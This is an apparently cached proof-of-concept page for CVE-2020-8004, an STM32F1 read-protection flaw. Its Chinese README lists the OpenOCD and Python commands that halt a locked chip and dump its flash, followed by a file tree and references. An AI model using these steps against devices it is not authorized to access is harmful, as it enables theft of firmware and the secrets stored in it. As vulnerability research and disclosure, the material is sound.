CVE-2020-8004 PoC — STMicroelectronics STM32F1 信息泄露漏洞

Source

https://github.com/wuxx/CVE-2020-8004

Associated Vulnerability

Title:STMicroelectronics STM32F1 信息泄露漏洞 (CVE-2020-8004)
Description:STMicroelectronics STM32F1是瑞士意法半导体（STMicroelectronics）公司的一款基于ARM Cortex M3的32位微控制器。 STMicroelectronics STM32F1中存在信息泄露漏洞，该漏洞源于不正确的访问控制。攻击者可利用该漏洞获取内存内容。

Readme

## CVE-2020-8004
## 测试
`$cd openocd-toolbox/scripts/linux/stm32f1x/`  
`$./lock.sh`  
`$./attach.sh`  
`($telnet localhost 4444)`  
`($reset halt)`  
`($mdw 0x08000000)`  
`$cd stm32f1-firmware-extractor`  
`$python3 main.py 0x08000000 512`

![test](https://github.com/wuxx/CVE-2020-8004/blob/master/doc/test.jpg)
![screenshot](https://github.com/wuxx/CVE-2020-8004/blob/master/doc/screenshot.png)
## 参考
- https://blog.zapb.de/stm32f1-exceptional-failure/
- https://gitlab.zapb.de/zapb/stm32f1-firmware-extractor/
- https://www.muselab-tech.com/cve-2020-8004-lou-dong-yuan-li-fen-xi/
- 《Cortex-M3权威指南》

File Snapshot


 [4.0K]  /data/pocs/c2f44a6135ae21dd7bdc8c98bf8235b7f0c83cbd
├── [4.0K]  doc
│   ├── [ 39K]  screenshot.png
│   └── [157K]  test.jpg
├── [4.0K]  openocd-toolbox
├── [ 623]  README.md
└── [4.0K]  stm32f1-firmware-extractor
    ├── [4.0K]  firmware
    │   ├── [1.2K]  main.c
    │   └── [2.0K]  Makefile
    ├── [9.6K]  main.py
    ├── [4.9K]  openocd.py
    └── [6.2K]  openocd.pyc

4 directories, 8 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!